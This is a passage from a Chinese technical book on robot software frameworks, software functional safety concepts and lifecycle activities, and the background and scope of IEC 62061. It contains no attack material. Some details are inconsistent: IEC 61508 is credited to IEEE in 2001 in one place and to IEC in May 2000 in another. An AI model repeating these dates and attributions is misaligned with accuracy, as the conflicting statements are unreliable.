Orocos是自2001年以来用于机器人开发的开源框架之一。Orocos的研发重点一直是提供一个硬实时功能组件框架,即所谓的实时工具包(RTT),用C语言实现,并且尽可能地独立于任何通信中间件和操作系统。与aRDnet和YARP类似,根据数据流通信范例,组件通过无锁输入/输出端口异步交换数据和事件来相互作用。 Orocos的区别性特征是组件模型的定义,它指定了并发活动的标准行为。具有实时性、确定性和循环行为的组件获得用于计算的固定和循环时间,并且在计算周期内它们必须达到稳定的中间状态。Orocos组件被实现为基类TaskContext的扩展(继承),拥有自己的执行线程,并且可以作为共享相同地址空间的对象或利用CORBA(公共对象请求代理体系结构)中间件进行通信的可执行文件进行部署。 4)SmartSoft SmartSoft是一个开源框架,专门解决机器人控制系统软件组件之间通信相关的问题。与Orocos类似,它定义了一个基于端口的组件模型,具有一组丰富的标准组件接口(称为通信模式),它具有严格定义的交互语义。 ·发送:定义与客户端/服务器关系的单向通信。 ·查询:定义与客户端/服务器关系的双向请求通信。 ·推送最新/推送定时:具有发布者/订阅者关系的1对n分发(广播)事件;具有客户端/服务器关系的异步条件通知。 ·动态接线:具有主/从关系的动态组件接线。 SmartSoft是首批基于Eclipse建模项目的机器人软件开发开源工具链的开源框架之一。工具链实现了一个工作流程,通过自动建模到模型转换,指导软件开发人员实现从机器人软件体系结构的高级设计到组件的开发和部署。 5)机器人操作系统(ROS) ROS是一种基于消息的点对点通信基础设施,支持易于集成/独立开发的软件组件。因此,ROS是由一组彼此通信的节点组成的计算图。节点是功能块,被实现为封装机器人软件库的类,并提供对底层基础结构(ROS内核)通信的访问机制。节点被组织成分组(包含库、节点和消息定义的文件系统文件夹),这里被分组为专题堆栈,即导航堆栈。消息是可以嵌套到复合消息中的类型化数据,并且以异步方式根据发布/订阅通信范例在节点之间交换,而不需要节点彼此了解及同时参与交互。消息按主题组织,主题对应于订阅者感兴趣的事件。当节点收到属于订阅主题的消息时,异步调用消息处理程序,对消息有效负载执行某些计算并生成给定主题的新消息,以发布计算结果。 ROS的区别性特征是ROS库中缺乏强制体系结构。例如,ROS节点被设计为可单独重用的组件。应用程序是通过配置各个节点来构建的,以便它们交换常见主题的消息。这种特征有利于各种机器人子领域的专家对许多小型封装进行分散式开发。 6)GenoM/BIP GenoM是由LAAS CNRS机器人组开发的面向组件的软件包,用于指定和实现机器人系统体系结构的功能级别。GenoM组件是控制服务的集合,它执行有限状态自动机,并由一组称为代码的C语言函数实现,这些函数在特定的状态转换(启动、执行、报错等)期间得到适当调用。GenoM组件通过共享内存区域交换数据和事件。 GenoM的典型特征是集成了行为-交互-优先级(BIP)框架。BIP是一个软件框架和工具集,用于正式建模和验证复杂、实时的基于组件的系统,以保证机器人控制系统的正确构建。BIP用于生成正式交互模型,该模型可用于系统级协调以运行(使用BIP引擎)由所有GenoM模块组成的功能层。BIP允许使用连接器对复合组件进行分层构建,连接器将GenoM组件的端口互相连接,并为两种基本通信模式(呼叫/提供者和广播/收听者)建模。 7)机器人最佳实践项目(BRICS) BRICS是上述项目的补充,它是由欧盟委员会资助的联合研究项目。其根据模型驱动工程原理正式确定机器人的开发过程,并提供了工具、模型和功能库,允许减少机器人软件系统的开发时间,特别是在机器人的开发过程中引入了组件框架和软件产品线的概念。这种方法促进了对现有软件或软件知识的常规使用,帮助构建新的软件,从而可以利用应用程序之间的需求、体系结构和设计之间的相似性来实现软件质量、生产力和业务性能方面的实质性收益。 1.2 软件功能安全概述 1.2.1 发展概况 嵌入式软件在安全关键系统中的应用,使得保障软件的功能安全成为软件工程领域的研究热点。软件作为系统的重要组成要素,不会直接危及生命、财产和环境等安全,但借助软件实现的人机交互却可能因软件失效造成人员误操作,从而形成危害。对于没有人机交互的嵌入式安全关键系统而言,软件错误地控制系统也可能造成灾难性的后果。以机器人控制软件为例,在软件控制机械臂执行任务时,当控制的距离参数、速度参数溢出时,控制软件需要确保机械臂不会执行该指令,以免造成人身伤害及财产损失。当软件可以引起危害或控制危害的发生时,该软件就是危险的。 软件安全性(Software Safety)一词最早出现在1979年美国发布的MIL-STD-1574A中。1986年,MIT(麻省理工学院)的Leveson教授提出,软件安全性在系统的生命周期中应该作为一个单独的课题加以重点研究。此后,美国国防部(DoD)、美国国家航空航天局(NASA)、美国联邦航空管理局(FAA)、欧洲航天局(ESA)、英国国防部(MoD)等国防、科研机构及电气与电子工程师协会(IEEE)、国际电工委员会(IEC)、航空无线电技术委员会(RTCA)等标准化组织均对软件功能安全展开了进一步研究,形成了一系列标准、论著、论文等出版物,涉及国防、交通、医疗等多个安全关键领域。 软件的功能安全在近年来得到了广泛的研究,形成了软件安全性工程体系,研究的内容包括软件安全性需求的获取与描述、面向标准的软件开发过程、软件安全需求验证,形成了一系列的软件安全性分析标准、方法及工具。实施软件安全性工程的主要作用如下。 (1)有效地防止系统事故的发生,或者降低事故的严重程度。 预防事故发生和减少损失是开展软件安全性工作的首要任务。通过对系统危险的识别与分析,从软件异常导致事故发生和软件控制事故不发生两个方向入手,分析系统中存在的与事故发生紧密相关的薄弱环节,分析出软件在其中的放大或控制作用,从而开展面向过程及面向产品的软件安全性工作,以便将系统事故发生的概率降低到可以接受的范围内,或者将事故的危害程度降到足够低。 (2)面向全生命周期,权衡软件安全性和成本。 作为软件质量的重要组成部分,确保软件安全性的核心目标之一是降低软件全生命周期成本,提高软件质量。通过开展面向需求、设计、实现、测试评价、使用、维护、退役全生命周期的软件安全性定量分析,权衡提高软件安全性带来的收益及开展软件安全性工作的成本,找到全生命周期最优化解决方案,在可承受的范围内尽可能地防止事故的发生或降低事故的严重程度。 (3)提高安全人员技术水平与安全管理水平。 开展软件安全性工作,提高安全人员技术水平,以及提高协同开发人员与运维人员(软件研发工程师、软件测试工程师、软件质量保证工程师、软件运维工程师等)的安全意识,在生命周期内全面落实安全措施。开展软件安全性活动还有利于提高安全管理水平,形成标准、数据、经验的积累,建立软件安全数据库,为后续软件产品相关安全性指标的制定与安全性需求获取与验证提供数据基础,通过标准的方式固化并贯彻执行。 1.2.2 基本概念 在系统介绍软件功能安全之前,本节先参考GJB 451A—2005和GJB 900A—2012及MIL-STD-882D和GEIA-STD-0010等相关标准,给出系统安全的相关定义。安全被定义为不出现可能造成人员伤亡、职业病发作、设备损坏、财产损失或环境损害的状态。该定义是指产品在生命周期内,包括试验、生产和使用等时的状态,即产品在某一时刻是否安全。安全性指产品所具有的不导致人员伤亡、系统毁坏、重大财产损失或不危及人员健康和环境的能力。安全性和安全的概念非常接近,后者更强调产品瞬时的安全状态,而前者强调产品在生命周期内维持安全状态的能力。 简单来说,软件安全性可以被认为是软件所具有的不导致人员伤亡、系统毁坏、重大财产损失或不危及人员健康和环境的能力。然而,由于软件自身不能直接造成安全事故,和产品安全性相比,这个定义难以直指软件安全性的本质。为了强调软件安全性的特性,学术机构、相关学者及标准都提出了软件安全性的定义。例如,在NASA 8719.13A中,软件安全性是指在软件生命周期内,应用安全性工程技术,确保软件采取积极的措施提高系统安全性,确保降低系统安全性的错误已经减少到或控制在一个风险可接受的水平内;Leveson指出,软件安全性是指确保软件在系统上下文中执行时不会发生不可接受的风险;GJB142—2014则将软件安全性定义为软件具有的不导致事故发生的能力。 与软件安全性较为接近的概念是软件可靠性。在GJB/Z161—2012中,软件可靠性被定义为在规定的条件下和规定的时间内,软件不引起系统失效的能力。软件安全性强调软件不引起系统事故发生,而软件可靠性强调软件不引起系统失效。软件安全性和软件可靠性的差别主要有以下3点。 (1)软件安全性不强调量化评估,而软件可靠性强调量化评估。软件可靠性的定义强调了“规定的时间”,即通过在一个时间段内考查软件是否失效来定量衡量软件的可靠性水平,如采用MTBF(平均故障间隔时间)、R(可靠度)等可靠性参数来衡量。软件安全性则主要采用基于软件安全完整性的分级评估方法来衡量,通常采用安全完整性等级(Safety Integrity Level,SIL)来评价软件安全性,并具体规定具有不同SIL的软件需要在生命周期内开展哪些活动及通过哪些评估才能在工程实践中被认为开发出的软件足够可靠。 (2)软件安全性适用于安全关键场景,而软件可靠性适用范围更广泛。软件安全性聚焦于事故,即可能造成人员伤亡、职业病、设备损坏、财产损失或环境破坏,其应用范围被限定在安全关键领域,如航空、航天、兵器、船舶、核工业、汽车等,分析对象较为明确。软件可靠性聚焦于失效,因此不局限于事故等安全关键场景,分析范围更大,但考虑到开展软件可靠性评估工作成本较高,针对非关键场景开展软件可靠性评估工作有时并不能带来正向收益。 (3)事故并不总是由失效引起的,因此需要在保证软件可靠性的基础上开展软件安全性需求获取与验证工作。软件失效指需求规格说明和软件行为之间的偏离,软件失效是导致系统事故的重要因素。然而,即使软件未发生失效,也可能由于软件安全性需求获取不充分而导致系统事故的发生。例如,飞机控制软件的需求规格说明中未指出飞机起飞后起落架必须收回,则飞机在实际飞行过程中未收回起落架不被认为软件失效,但此时系统存在严重的安全隐患,可能导致重大事故的发生。因此,需要开展软件安全性需求获取工作,获取 “飞机在飞行时起落架必须保持收回状态”等软件安全性需求,并验证该需求实现的正确性、一致性等。 软件安全性和软件信息安全也是一组相近的概念。两者的主要区别在于,软件安全性主要考查软件功能是否能可靠实现,而软件信息安全主要考查软件是否能抵御入侵者的攻击,包括后门攻击、流量攻击、信息窃取、木马攻击等。实际上,由于软件安全性涉及对安全关键功能、指令、数据的防护,而软件信息安全涉及对功能、指令、数据的入侵、窃取和破坏,因此保障软件信息安全也是保证软件安全性不可缺少的一环。当然,我们也需要权衡软件安全性和软件信息安全之间的关系。例如,对多个不同来源的关键指令采用表决机制检查其一致性可以有效保障软件的安全性,但源于多系统的数据融合也容易带来软件信息安全问题。 1.2.3 工作内容 开展软件安全性相关工作主要遵循验证和确认(Validation&Verification,V&V)瀑布式开发流程,在每个主要阶段,如系统需求分析与设计阶段、软件需求分析阶段、软件设计阶段、软件实现阶段、软件测试阶段,开展软件安全性相关工作。主要工作思路是,识别出可能导致系统严重事故发生的软件作为软件安全性分析对象,在考虑系统已经采取的安全措施的基础上,通过编制软件安全性计划的方式,在软件生命周期中考虑如何保障软件安全性,开展软件安全性分析、评估、验证等工作,确保软件足够安全并最终形成软件足够安全的结论。 在软件生命周期中的各个阶段开展的软件安全性相关工作如下。 (1)在系统需求分析与设计阶段,开展软件安全性等级确定及软件安全性计划编制两项工作。 软件安全性等级确定工作首先需要确定软件是否为安全关键软件。如果是,则需要确定软件安全性等级,并对具有不同安全性等级的软件选用不同的安全性方法和管理措施,以保障软件满足不同的安全性要求。一般来说,当系统/子系统被确认为安全关键系统后,需要对该系统/子系统内的所有软件进行分析。可以从以下方面确认安全关键软件:①软件实现或控制了系统的安全关键功能;②软件能够导致或控制危险的发生;③软件用于处理安全关键场景的数据和指令,这些数据和指令可能会导致其他系统出现安全事故或导致决策错误并造成严重后果;④软件用于检测系统的安全状态,具备告警功能;⑤和其他安全关键软件在同一分区内,无法彻底屏蔽级联失效的其他软件。 软件安全性计划编制工作能够从技术和管理的角度,保障软件中的风险被充分地识别、处理和规避,并为这些技术的落实提供管理支持,为后续时间、人员、资源、成本等的分配提供依据。软件安全性计划应包括:①软件安全性工作要求,如组织结构、活动项(分析对象、分析与测试验证技术等)、执行方式、预期进度,以及与软件工程、软件可靠性工程、系统安全性工程的关系等;②软件安全性管理要求,如软件安全性工作的审查节点、审查人员、审查方式、审查通过判据等;③在软件需求、使用方式与预期存在较大偏差,或者软件经过了迭代修改时,应及时修改软件安全性计划。 (2)在软件需求分析阶段,开展软件安全性需求获取工作及软件安全性需求验证工作。 软件安全性需求获取工作主要以工程经验、相关标准、分析人员经验、历史事故报告、系统安全性需求、系统危险分析等作为输入,凝练、提取软件安全性需求,以保证软件安全性需求的正确性、充分性、一致性等相关属性。尤其是软件安全性需求的充分性容易被遗漏,必须通过软件安全性需求获取工作保证软件需求规格说明的安全性。软件安全性需求获取工作应保证:①不允许单个功能或操作触发潜在的危险;②充分识别安全相关的软件需求,包括软件在某种模式或状态下“必须”执行的操作或保持的状态,以及“禁止”执行的操作或触发的状态;③当可能导致事故发生的失效出现时,软件应能使系统进入安全状态,即失效安全(Fail-Safe)状态;④软件安全性需求应具有双向可追踪性,具有唯一标识,做到描述准确、可测试、可验证。 软件安全性需求验证工作以软件安全性需求作为验证对象,主要验证软件安全性需求的正确性、充分性和一致性等属性,从而发现软件需求中存在的前后矛盾、描述不清晰、安全关键功能未定义等问题,并发现新的软件安全性需求问题,提升软件安全性需求质量。软件安全性需求验证工作应保证:①对潜在的失效进行考虑,并提出明确的失效缓解措施,如失效安全机制、关键指令保护、关键决策表决、对时序约束的检查与保护、对失效的冗余措施等;②对系统应处于的状态进行严格的限制和约束,以防止系统由于触发了非预期事件处于非预期状态,进而引发潜在的事故;③对软件安全性需求的正确性、充分性和一致性进行检查;④保证软件安全性需求的可追溯性。 (3)在软件设计阶段,开展软件安全性设计和验证工作。 软件安全性设计工作主要用于发现软件设计阶段新的危险源,将软件安全性需求进一步细化到模块和组件上,并采用一系列工程技术满足软件设计的安全性。软件安全性设计工作主要包括:①进一步细化需求阶段的软件安全性分析,开展软件故障树分析(SFTA)、软件失效模式和影响分析(SFMEA)、数据流分析、信息流分析、软件复杂网络分析等工作;②将细化的软件安全性需求分配到模块和组件上,并对安全关键模块或组件进行标识;③制定软件安全性准则,并依据软件安全性准则开展软件安全性设计工作。 软件安全性设计验证工作主要用于确保软件安全性设计实现的正确性、充分性和无二义性。软件安全性设计验证工作主要包括:①验证软件安全性设计是否正确实现;②保障软件在运行中处于安全状态,以及出现失效时软件可以将系统置于安全状态;③确保软件在失效时可以被物理隔离或逻辑隔离,防止级联失效的出现。 (4)在软件实现阶段,开展代码安全性分析验证工作。 代码安全性分析验证工作主要面向代码编写规范、编码检查单等,验证代码实现与安全性需求、设计的一致性。代码安全性分析验证工作主要包括:①代码实现功能与需求、设计的可追踪性,保证所有需求项和设计项已实现,并且未引入额外的功能;②开发时遵守代码编写规范,按编码检查单进行开发,如遵守MISRA C开发标准等;③代码实现没有引入额外的危险。 (5)在软件测试阶段,开展软件安全性测试验证工作。 软件安全性测试验证工作主要用于验证是否所有软件安全性需求都被正确实现,以及在异常情况下和临界情况下软件能否维持在安全运行状态并保证软件安全性测试的充分性。软件安全性测试验证工作主要包括:①所有可识别的危险都已经消除,或者影响处于可接受的范围内;②软件在硬件异常输入、人员异常操作、通信错误等异常情况下仍能使系统安全运行;③在测试阶段发现的问题,必须修改后进行问题归零,并采用回归测试的方式保证问题修复过程未引入更多的缺陷;④满足测试覆盖率要求,所有安全性功能得到了正确的执行。 1.3 IEC 62061标准发展概述 1.3.1 IEC 62061标准起源 1. 功能安全标准IEC 61508 1996年,Neil Storey在SAFETY-CRITICAL COMPUTER SYSTEMS(见图1-7)中首次提出了功能安全(Functional Safety)一词。书中定义的功能安全是整个系统安全的一部分,它与设备能否正确执行其设计功能有关(包括应对人员操作失误、软/硬件失效及环境发生变化的情况等)。使用者在操作设备时可能面临危害身体健康甚至危及生命的风险,因此功能安全的目标是规避这种不可接受的安全风险。例如,具备功能安全的机器人在工作时,内置传感器会监控运行速度和输出力矩,如果机器人与人员发生碰撞,则会立刻停止运行,保证机器人的碰撞力不超过限值,以免对人体造成严重伤害。 图1-7 SAFETY-CRITICAL COMPUTER SYSTEMS书籍封面 总体来看,功能安全涉及技术和管理两个方面,通过提高安全设施有效性来控制与管理各类危险源,避免或减少工业事故对公众和环境的影响,防止各类装备尤其是成套装置发生不可接受危险的技术,涉及交通、机械、能源、城市基础设施等与人身、财产等安全相关的领域。例如,核电站的安全控制系统是一种安全设施,其功能是当反应堆达到危险值时停止核电站的运行,其控制和监测功能覆盖了核电站的所有过程系统,执行相应的监督功能和控制保护功能。如果这个功能失效,数值达到危险值时持续工作,则会引发爆炸,人员可能会遇到危险。安全预警系统具有一定的风险降低能力。2011年3月11日,日本本州岛东北部海域发生了里氏9.0级大地震,引发了海啸,造成东京电力公司福岛核电站事故的发生。具体原因是,海啸来临时,位于地下室的应急柴油发电机被淹没,无法紧急启动,导致核反应堆在持续高温高压下,发生堆芯熔毁。 安全设施的每个安全功能都对应降低某个危险事件的风险。功能安全的基础标准IEC61508把每个安全功能降低风险的能力定义为安全完整性等级(Safety Integrity Level,SIL)。如果安全设施可以将风险概率降低一个数量级,如采用该安全设施后,由原来一年发生一次事故降为几十年发生一次,则表示该安全设施具有SIL1的能力。如果安全设施可将风险概率降低4个数量级,如采用该安全设施后,由原来一年发生一次事故降为几万年发生一次,则表示该安全设施具有SIL4的能力。SIL的概念适用于所有安全设施,只要安全设施具有风险降低功能,就可以用量化的方法确定其风险降低能力。 不断推进的工业化在为人类生活提供丰富的物质的同时,也逐渐成为威胁人身安全的“凶手”,生产事故的频发使得安全生产这一话题越来越受到关注。在工业企业使用相应的设备时,管理者应该把安全放在第一位。只有充分考虑到人和设备的安全,牢固树立安全第一的思想,才能产生巨大的生产效益和社会效益。 在绝大多数传统制造车间和工厂中,出于安全性考虑,需要使用防护栏把机器人和人员进行隔离,工业机器人防护栏如图1-8所示。 图1-8 工业机器人防护栏 功能安全被视为整体安全的一部分,取决于一个系统或设备的运行是否能够正确回应所接收到的输入信号。随着技术的飞速发展,越来越多的安全功能是通过由电机、控制软件等组成的系统来执行的。通常这些系统非常复杂,因此软件功能安全的设计、确认和验证非常重要且十分必要。 为促进安全相关产品安全水平的提升,电气与电子工程师协会于2001年发布了首个产品安全性标准——IEC 61508,从研发过程管理、安全保障技术等多个方面对安全相关产品(含软件)提出了要求,并得到了国际上知名检测认证机构(TUV、SGS、UL、CSA等)、领军企业(波音、空客、GE、ABB、宝马)的广泛支持。IEC 61508标准对功能安全的定义是:保证电气、电子、可编程电子安全系统功能安全、可靠、正确实现,包括其他外部风险降低设施和安全相关系统功能可靠、正确执行,并且当发生故障(包括随机故障和系统故障)或失效时,安全相关系统会采取措施,保证不会引起人员的伤亡、环境的破坏、设备财产的损失。 有了IEC 61508,在车间安全中对安全系统的要求可相对于应用独立定义,其不仅协调了国家法规与国际标准,还增加了配备微处理器的设备和传感器的使用要求(这些微处理器可帮助实现安全功能)。在此“功能安全”标准中,这些系统安全要求通常被划分为不同安全完整性等级(SIL1~SIL4),设备、传感器或控制系统也因此有一个对应的SIL。IEC 61508对安全相关软件的需求、设计、实施、测评提出了具体的技术要求。 2. 在机械领域的新旧标准、安全分类和SIL 1)国外机械安全的标准体系 早在20世纪七八十年代,欧美等发达国家已经基于良好的工程实践准则,建立了一套机械安全的最佳实践方法。在机械领域,为了保护操作者的安全,人们制定了详细的安全规程,操作者必须遵守;这反过来推动了范围更广的工程标准的制定,定义了通用的机械安全要求(还有许多标准针对的是特定类型的机械)。 一般来说,标准要求机械设备的供应商确保其产品是安全的;而机械设备的操作方和使用方则必须确保机械设备在使用过程中是安全的。因此,确保机械安全的原则如下: ·与目前已知的安全标准一致; ·如没有相关的标准存在,则遵循一系列设计和应用原则,按不同领域的指导标准建立新的标准。 应用这些原则的最佳范例是欧盟的机械安全指南及与其相关的附加标准,欧洲机械安全标准的结构如图1-9所示。 图1-9 欧洲机械安全标准的结构 从图1-9中可以看出,所有标准均衍生自Type A标准(基本安全标准),Type A标准是对所有机械设备适用的安全准则;Type B标准(总体安全标准)确定了对机械设备适用的通用安全方法,包括安全性技术标准和安全性设备标准;Type C标准则是基于Type A、Type B标准为特定类型的机械设备修订的标准,仅适用于特定的机械设备。 (1)Type A标准。 Type A标准制定了相关的原则、规程,以便新标准的制定者针对新的机械设备制定更为具体的标准。应用较为广泛的Type A标准如下。 ·EN292的Part1和Part2:基本用途是给设计者、制造者提供机械安全方面的综合参考,如提供机械安全的基本概念、设计的一般原则等。Part1主要定义制定机械安全标准所用的术语;Part2主要规定了设计机械产品时,为了保证机械安全而应遵循的技术原则与规范,适用于各类机械产品的设计,也适用于具有类似危险的其他技术产品的设计。 ·EN1050:1996:提供机械安全危险评估原理,为机械安全防护的第一个重要阶段,提供安全风险评估方法及评估的原则和要求。 (2)Type B标准。 下面分类介绍Type B标准。 ·Type B1:安全性技术标准(涉及安全距离、表面温度、噪声等)。例如,EN 60204-1和EN 954-1(对应的新标准为ISO 13849-1:2023)。 ·Type B2:安全性设备标准(涉及双手控制设备、联锁装置、压力感应装置、防护罩等)。例如,EN 418:1992、EN 61496:2004。 (3)Type C标准。 Type C标准对特定及大部分机械设备的安全要求有详尽的描述。目前,已有大量的Type C标准被制定,用于针对特定的机械风险。而且因为这些标准都是基于Type A和Type B标准制定的,因此术语、定义及常规措施是与Type A、Type B两类标准一致的。例如,若要制定一个用于安全防护或紧急停车装置的Type C标准,则会引用Type B标准的内容。 2)国内机械安全的标准体系 我国机械安全标准结构与国外的保持一致。全国机械安全标准化技术委员会(SAC/TC208)与ISO/TC199的工作领域一致,主要负责全国机械安全Type A标准和Type B标准的技术归口和ISO/TC199的国内对口管理工作。其通过对ISO、欧盟、美国和日本的机械安全标准及标准体系的研究,采纳ISO和欧盟所采用的机械安全标准分类法,构建了我国机械安全标准体系,如图1-10所示。 图1-10 我国机械安全标准体系 与国外的机械安全标准结构类似,我国的机械安全标准体系分为两个类别(层次)。 第一类是基础标准(A类),体系中A类标准分为设计通则、风险评价和技术指南3个部分。基础标准是所有机械安全标准的基础,规定了机械安全的最基本原则和方法,对机械安全的所有标准具有统领和指导意义。 第二类是通用标准(B类),类似国外的分类方法,我国把B类标准分为安全特征(B1)类标准和安全装置(B2)类标准。B1类标准包括安全距离、接近速度、温度限值、卫生要求、集成制造系统、排放、辐射、火灾防治、人类工效学等内容;B2类标准包括控制系统、急停、意外启动、双手操纵装置、联锁装置、防护装置、进入设施等内容。 值得注意的是,这些机械安全相关标准,并没有软件安全性约束和指导性文件,这在20世纪八九十年代是可以接受的,因为软件在机械安全上的作用不强。但是,随着软件化、智能化的发展,新的可编程控制系统的功能安全标准逐步出现并得到广泛应用。 3)适用于可编程控制系统的功能安全标准 当前计算机、集成电路等技术的发展已经渗透到所有工业领域,计算能力的极大增加彻底改变了工厂和工业过程控制,也改变了安全控制策略。对于将包含电子、电气设备及计算机软件、硬件的系统应用于关系到人身财产安全的领域,进行规范的安全指导是十分必要的。现有的基于硬件的安全控制实践经验、规程已无法适用于可编程控制系统。因此,专家学者们探索出了适用于可编程控制系统的功能安全标准。 在控制系统的功能安全概念未出现前,与此最相关的标准是EN 954:1996。但是,这个标准针对的是硬连接电路和中继设备,没有考虑诸如PLC、通信网络等在内的嵌入式系统带来的复杂安全风险及处理这些安全风险的措施。在这种情况下,2000年5月,国际电工委员会正式发布了IEC 61508标准。IEC 61508标准针对由电气/电子/可编程电子部件构成的、起安全作用的电气/电子/可编程电子系统的安全生命周期,建立了一个基础的评价方法,目的是针对以电气/电子/可编程电子系统为基础的安全系统提出一个一致、合理的技术方案,统筹考虑单独系统(传感器、通信系统、控制装置、执行器等)中元件与安全系统的组合问题。机械安全相关的功能安全标准发展如图1-11所示。 图1-11 机械安全相关的功能安全标准发展 IEC 62061是在IEC 61508基础上的机械/工业机器人领域的标准,它对安全相关的电气控制系统实施方法进行了说明,对从初步设计到停止运作的各个阶段进行测试,主要向安全相关电气控制系统的规划者、建造者和用户进行说明。标准提供的方法和要求如下。 (1)指定由SRECS执行的各个安全相关控制功能要求的安全完整性等级。 安全完整性是指在规定的条件下、规定的时间内,安全相关系统成功实现所要求的安全功能的概率。由于IEC 62061基于IEC 61508编制,因此其安全完整等级的划分、评定与IEC 61508有着共性,即:安全相关系统有SIL1~SIL3共3种安全完整性等级;安全相关系统的安全完整性等级越高,不能实现所要求的安全功能的概率就越低;安全完整性由硬件、软件和系统的安全完整性构成。 (2)使SRECS设计适合指定的安全相关控制功能,使设计的集成安全相关子系统符合ISO13849标准要求。 IEC 62061标准给出了符合功能安全要求的SRECS选择原则、设计和实现方法,包括系统架构的选择、安全相关软/硬件的选择、软/硬件的设计、设计的软/硬件符合功能安全要求的验证。但是,在本标准中,安全相关软件的选择、设计只给出了要求,并不具备可行的设计方案。 (3)确认SRECS。 IEC 62061标准给出了应用于SRECS确认流程的具体要求,包括对SRECS软/硬件的检查和测试,以满足安全需求规格说明书的要求。 1.3.2 IEC 62061标准适用范围 IEC 62061标准从内容和目标两个方面界定了其适用范围。 1. 涵盖的内容 标准是对机械安全相关电气、电子和可编程电子控制系统的设计、集成和确认规定要求和给出建议,以下方面值得注意。 (1)“在本标准中,假设复杂子系统或子系统元素的设计符合IEC 61508有关要求”,即在默认情况下,要求大型复杂的控制系统子系统符合IEC 61508要求。 (2)“没有规定机械非电气(如液压、气动)控制元素性能要求”。 从标准的继承性来看,IEC 62061主要参考了IEC 61508的第2、3部分,也就是软件、硬件开发部分,所以IEC 62061更适合用来评估比较复杂的系统,其根据相关计算得出的每个控制通道的PFH(每小时的危险失效概率)将元件或者系统分为3个安全完整性等级,即SIL1、SIL2、SIL3,但其只针对电子、电气和可编程电子控制系统。ISO 13849继承了EN 14121及EN 954的基本原则,侧重于分析控制电路的结构,按照电路结构,其将电路分成B、1、2、3、4共5个类别,再辅以适当MTTF值和DC值,来达到预期的性能等级(Performance Level,PL)描述,PL分为a、b、c、d、e这5个等级,而且其中还涵盖了对液压和气动元件的分析。IEC 62061和ISO 13849建议应用范围如表1-1所示。 表1-1 IEC 62061和ISO 13849建议应用范围 2. 特定条款的目标 本书将对标准特定条款中与软件相关的条款进行详细的解读,用以指导从事软件功能安全工作的技术人员、管理人员、第三方测评机构人员,以及希望了解机械/工业机器人控制系统软件安全和管理的人员更深入地了解IEC 62061标准,使用户有计划、有步骤地完成软件功能安全要求的采用,确保产品的功能安全。特定条款的目标如表1-2所示。 表1-2 特定条款的目标 IEC 62061引用了9项IEC或ISO的国际标准,其中: (1)IEC 60204-1《机械安全 机械电气设备 第1部分:一般要求》、IEC 61000-6-2《电磁兼容 第6-2部分:通用标准——工业环境中的抗扰度试验》、IEC 61310《机械安全指示、标记和驱动》这3个标准都是直接采用机械安全相关的IEC标准。 (2)ISO 12100:2003《机械安全 基本概念和设计通则》已被更新为ISO 12100:2010《机械安全 设计通用原则:风险评估和风险降低》。 (3)IEC 62061直接把IEC 61508标准第2部分、第3部分的要求等标采用,而在后续内容中,IEC 62061直接引用了相关要求,对机械/工业机器人控制系统软件的功能安全设计、实现和确认并没有提出额外要求。 本标准用于ISO12100:2010描述的降低系统风险的框架范围内,并根据ISO14121(EN1050)描述的准则,同风险评估一起使用。IEC 62061与其他标准的关系如图1-12所示。 图1-12 IEC 62061与其他标准的关系 1.3.3 标准规定的系统安全生命周期及其相关活动 按照IEC 62061标准定义安全生命周期的理念和要求,安全相关电气控制系统安全生命周期活动如图1-13所示。整个标准均按照相关活动的要求和目标两个部分组成。 1. 创建安全计划 标准规定了在实现安全系统时应遵循的一种系统性步骤,包括从被控对象的风险分析和风险评估,到SRECS的设计、实现、验证等一系列活动的记录文档,如为实现安全系统的所有相关活动的计划和步骤、功能安全实现方法、执行和审核所有活动的责任分配计划、活动执行和复审的规则、配置管理过程、验证计划和确认计划。 2. 风险分析及评估 风险分析的结果是设计安全相关控制系统的根本依据。风险分析的主要内容包括在用该设备时有何种风险、降低该风险需要什么安全相关功能。而风险评估则根据风险分析的结果,确定需要采取什么风险降低措施,确定安全相关控制功能的SIL。 图1-13 安全相关电气控制系统安全生命周期活动 3. 制定SRCF规范/说明 制定SRCF规范/说明以风险和危险分析为依据,主要内容包括SRECS的基本信息、危险源、防护对象、功能性要求、故障响应、安全完整性要求等。 4. 设计SRECS结构 SRECS结构设计的目的是将整个SRCF分解成多个功能块,并把安全完整性等级分配给各个子系统。 5. 系统实现 根据结构设计方案实现各个子系统。 6. 确定已达到的SIL 评估SRECS安全完整性。由SRECS完成的SIL应由子系统的危险随机硬件失效概率、体系结构限制和构成SRECS的子系统的系统安全完整性来确定。已实现的SIL小于或等于系统安全完整性和体系结构限制的任何子系统的最低SIL。 7. 硬件实现 按照SRECS设计文件的硬件设计方案进行实现。 8. 软件说明 标准要求要想将软件用在实现安全相关控制功能的SRECS中的任何部分,应开发软件安全要求规范并撰写文档。软件说明应包括系统的配置或结构、容量和响应时间特性、设备和操作者界面、安全要求规范中所规定的机器操作所有相关模式、外部装置诊断试验(传感器和最终元件等)。 9. 设计和开发软件 设计和开发软件包括嵌入式软件、参数化软件、应用软件的设计和开发,以及软件配置等内容。在标准中,设计和开发软件只在条款6.11中进行了简单描述,可行性不强。因此,本书将重点针对功能安全相关软件的设计和开发给出可行性方案。 10. 集成及测试 安全相关应用软件集成到SRECS应包括在设计和开发阶段规定的试验,以保证应用软件和硬件及嵌入式软件平台的兼容性,从而满足功能和安全性要求,而且需要形成一系列文件,包括所有试验规范的版本、集成试验可接受的准则、受试的SRECS版本、使用的工具和设备连同校准数据等。 11. 安装 按照最终系统确认的功能安全计划进行安装,并做适当的记录,保证其适合预期用途和为确认做准备。 12. 用户信息编制 按照标准要求,制定符合标准的安装、使用与维护文件。 13. 执行确认 按照预定计划执行SRECS确认。 1.4 机械/工业机器人控制系统软件功能安全 虽然机械/工业机器人有了快速的发展,但是现有的大部分机械/工业机器人控制系统软件在开发过程中并没有遵循统一的开发标准,存在很多问题,如开放性差、独立性差、容错性差、扩展性差、缺少网络功能等,无法满足现代工业发展的需要。尤其在功能安全方面,标准对软件功能安全缺乏可行的实施指南,使得安全性设计、实施、测试、评估缺乏可操作性,如IEC 62061。 